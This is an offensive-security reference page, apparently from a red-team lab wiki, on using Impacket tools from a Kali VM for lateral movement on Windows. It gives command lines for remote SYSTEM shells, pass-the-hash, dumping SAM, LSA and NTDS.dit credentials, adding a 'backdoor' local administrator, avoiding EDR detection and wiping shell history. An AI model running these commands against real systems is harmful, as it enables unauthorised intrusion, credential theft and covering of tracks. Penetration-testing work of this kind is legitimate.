Skip to main content

Impacket


Overview​

Impacket is a Python library with standalone tools for interacting with Windows protocols β€” SMB, WMI, MSRPC, Kerberos, and more. All tools run from the Kali operator VM and authenticate against Windows targets using either plaintext credentials or NTLM hashes (pass-the-hash).

All Impacket tools are pre-installed on Kali Linux.


Authentication Formats​

All Impacket tools follow a common authentication syntax:

domain/username:password@<TARGET_IP>
domain/username@<TARGET_IP> # Prompts for password
domain/username:@<TARGET_IP> # Empty password
domain/username:<LM>:<NTLM>@<TARGET_IP> # Pass-the-hash

Pass-the-hash example: If you have captured NTLM hashes (e.g., from hashdump or Responder), you can authenticate without cracking:

impacket-psexec domain/Administrator:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c@<TARGET_IP>
# ^--- LM hash (can be blank/dummy) ^--- NT hash

For local accounts, use the hostname or . in place of domain:

impacket-psexec ./Administrator:Password123@<TARGET_IP>
impacket-psexec WORKGROUP/Administrator:Password123@<TARGET_IP>

impacket-psexec​

Executes commands on a remote Windows host via SMB. Uploads a service binary to ADMIN$, creates a service, and returns a shell. Writes to disk and creates a service β€” highest artifact footprint.

# Interactive SYSTEM shell
impacket-psexec domain/username:password@<TARGET_IP>

# Run a single command
impacket-psexec domain/username:password@<TARGET_IP> cmd.exe /c "whoami /all"

# Pass-the-hash
impacket-psexec domain/Administrator:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c@<TARGET_IP>
Artifact Footprint

psexec drops a binary to ADMIN$\SYSTEM32\ and registers a Windows service. This generates Security EID 7045 (service installed), creates file system artifacts, and is detected by most EDR products. Prefer smbexec or wmiexec where stealth matters.


impacket-smbexec​

Executes commands via SMB by writing a batch file to a share and executing it via the Service Control Manager. Does not drop a service binary β€” lower artifact footprint than psexec.

# Interactive shell (SYSTEM context)
impacket-smbexec domain/username:password@<TARGET_IP>

# Pass-the-hash
impacket-smbexec domain/Administrator::<NT_HASH>@<TARGET_IP>

Output writes to a temporary file on the remote host (%SYSTEMROOT%\Temp\) β€” slightly noisier than wmiexec but avoids service binary drop.


impacket-wmiexec​

Executes commands via WMI (TCP 135 + dynamic high port). Returns output through a temporary SMB share. Preferred method β€” no service creation, no binary drop.

# Interactive semi-shell (user context based on provided credentials)
impacket-wmiexec domain/username:password@<TARGET_IP>

# Single command execution
impacket-wmiexec domain/username:password@<TARGET_IP> "ipconfig /all"

# Pass-the-hash
impacket-wmiexec domain/Administrator::<NT_HASH>@<TARGET_IP>

# Execute as SYSTEM (requires SeImpersonatePrivilege β€” not always available)
impacket-wmiexec -nooutput domain/username:password@<TARGET_IP> "net localgroup administrators backdoor /add"
Preferred Execution Method

wmiexec generates fewer artifacts than psexec or smbexec. No service is created. Output is retrieved via a hidden share (ADMIN$) rather than a dropped file. Still generates WMI activity logs (EID 5861 if WMI subscriptions are audited) and network connections.


impacket-atexec​

Executes a command on a remote host via the Windows Task Scheduler (AT service / Task Scheduler COM interface over SMB).

impacket-atexec domain/username:password@<TARGET_IP> "whoami > C:\Temp\out.txt"

Output is written to a file on the remote host β€” retrieve via smbclient. Useful when WMI is blocked but SMB + Task Scheduler is available.


impacket-smbclient​

Interactive SMB client. Browse shares, upload/download files, execute limited operations.

# Connect to a specific share
impacket-smbclient domain/username:password@<TARGET_IP>

# Specify share at launch
impacket-smbclient domain/username:password@<TARGET_IP> -share C$

# Pass-the-hash
impacket-smbclient domain/Administrator::<NT_HASH>@<TARGET_IP>

Interactive Commands​

# Once connected:
shares # List available shares
use <SHARE_NAME> # Connect to share
ls # List directory contents
cd <PATH> # Change directory
get <FILENAME> # Download file
put <LOCAL_FILE> # Upload file
mkdir <DIR> # Create directory
rm <FILENAME> # Delete file
exit # Close connection

List Shares Non-Interactively​

impacket-smbclient domain/username:password@<TARGET_IP> -list <TARGET_IP>

impacket-secretsdump​

Dumps credential material from a remote host β€” SAM database (local hashes), LSA secrets, cached domain credentials, and NTDS.dit (if run against a DC).

# Dump all secrets from a remote host
impacket-secretsdump domain/username:password@<TARGET_IP>

# Pass-the-hash
impacket-secretsdump domain/Administrator::<NT_HASH>@<TARGET_IP>

# Dump NTDS.dit from a Domain Controller (requires DA credentials)
impacket-secretsdump domain/Administrator:password@<DC_IP> -just-dc-ntlm

Output includes:

  • Local SAM hashes: username:RID:LM:NTLM:::
  • LSA secrets (service account credentials, cached machine account passwords)
  • Domain cached credentials (DCC2 hashes β€” slow to crack)
Offline Dump

secretsdump can also process previously dumped files:

impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL

Tool Comparison​

ToolTransportArtifactsContextWhen to Use
psexecSMB 445Binary drop + serviceSYSTEMNeed SYSTEM; don't care about stealth
smbexecSMB 445Batch file in TempSYSTEMSYSTEM shell, lower footprint than psexec
wmiexecWMI 135 + highNone (output via ADMIN$)UserPreferred default β€” cleanest footprint
atexecSMB 445Scheduled taskSYSTEMWMI unavailable; task scheduler accessible
smbclientSMB 445NoneN/AFile browsing and transfer
secretsdumpSMB 445VSS shadow copy (brief)N/ACredential harvesting

OPSEC β€” Cleanup​

# Clear bash history of Impacket commands (credentials visible in history)
history | grep impacket
history -d <LINE_NUMBER>

# Or suppress history for a command (prefix with space β€” requires HISTCONTROL=ignorespace)
impacket-psexec domain/user:password@<TARGET_IP>
Credential Exposure

All Impacket tool commands include credentials as command-line arguments. These are visible in:

  • Shell history (~/.bash_history, ~/.zsh_history)
  • Process listing (ps aux) during execution
  • System logs on the operator's host

Sanitize history after use. Consider using a wrapper script or environment variables to reduce plaintext credential exposure in the process table.